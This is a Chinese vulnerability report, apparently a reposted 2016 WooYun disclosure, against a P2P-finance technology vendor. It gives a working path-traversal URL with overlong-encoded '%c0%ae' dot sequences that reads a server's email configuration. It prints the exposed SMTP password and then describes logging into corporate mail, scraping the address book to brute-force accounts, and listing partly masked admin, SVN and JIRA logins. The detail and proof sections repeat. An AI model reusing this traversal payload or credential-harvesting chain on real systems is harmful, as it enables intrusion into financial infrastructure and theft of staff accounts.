神刀安全网

漏洞标题: P2P金融安全之擒贼先擒王

漏洞详情

披露状态:

2016-04-07: 细节已通知厂商并且等待厂商处理中
2016-04-11: 厂商已经确认,细节仅向厂商公开
2016-04-21: 细节向核心白帽子及相关领域专家公开
2016-05-01: 细节向普通白帽子公开
2016-05-11: 细节向实习白帽子公开
2016-05-26: 细节向公众公开

简要描述:

P2P金融安全之擒贼先擒王,云信是一家提供互联网金融核心技术的企业,用户包含了http://www.creditcloud.com/work/

详细说明:

任意文件读取获取到了邮件信息;:

**.**.**.**:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/var/CreditCloud/config/EmailConfig.xml

code 区域
<host>**.**.**.**</host>
<port>465</port>
<user>donotreply@**.**.**.**</user>
<password>Passw0rd</password>

登录邮件

漏洞标题:  P2P金融安全之擒贼先擒王

把企业通讯录脱下来,拿来爆破下。

漏洞标题:  P2P金融安全之擒贼先擒王

获取几个默认密码,其他密码没尝试了。

漏洞标题:  P2P金融安全之擒贼先擒王

躺枪…

**.**.**.**

**.**.**.**:8080/admin

admin password

漏洞标题:  P2P金融安全之擒贼先擒王

http://**.**.**.**:8080/admin/login

admin password

http://**.**.**.**:8080/pro/login

admin password

太多这种正在开发的系统了。

SVN:

svn地址:svn://**.**.**.**/

账户:product

密码:CreditC**.**.**.**

漏洞标题:  P2P金融安全之擒贼先擒王

http://**.**.**.**/p2padmin/

1967165118@**.**.**.**

021488

漏洞标题:  P2P金融安全之擒贼先擒王

惊呆了,!!!我这辈子都赚不了这么多阿。

新浪微博 min.chen@**.**.**.** zealot

http://jira.**.**.**.**/

jinhui.cheng

123456

不深入了… 还有很多系统

漏洞证明:

任意文件读取获取到了邮件信息;:

**.**.**.**:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/var/CreditCloud/config/EmailConfig.xml

code 区域
<host>**.**.**.**</host>
<port>465</port>
<user>donotreply@**.**.**.**</user>
<password>Passw0rd</password>

登录邮件

漏洞标题:  P2P金融安全之擒贼先擒王

把企业通讯录脱下来,拿来爆破下。

漏洞标题:  P2P金融安全之擒贼先擒王

获取几个默认密码,其他密码没尝试了。

漏洞标题:  P2P金融安全之擒贼先擒王

躺枪…

**.**.**.**

**.**.**.**:8080/admin

admin password

漏洞标题:  P2P金融安全之擒贼先擒王

http://**.**.**.**:8080/admin/login

admin password

http://**.**.**.**:8080/pro/login

admin password

太多这种正在开发的系统了。

SVN:

svn地址:svn://**.**.**.**/

账户:product

密码:CreditC**.**.**.**

漏洞标题:  P2P金融安全之擒贼先擒王

http://**.**.**.**/p2padmin/

1967165118@**.**.**.**

021488

漏洞标题:  P2P金融安全之擒贼先擒王

惊呆了,!!!我这辈子都赚不了这么多阿。

新浪微博 min.chen@**.**.**.** zealot

http://jira.**.**.**.**/

jinhui.cheng

123456

不深入了… 还有很多系统

修复方案:

版权声明:转载请注明来源 _Thorns@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: P2P金融安全之擒贼先擒王

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址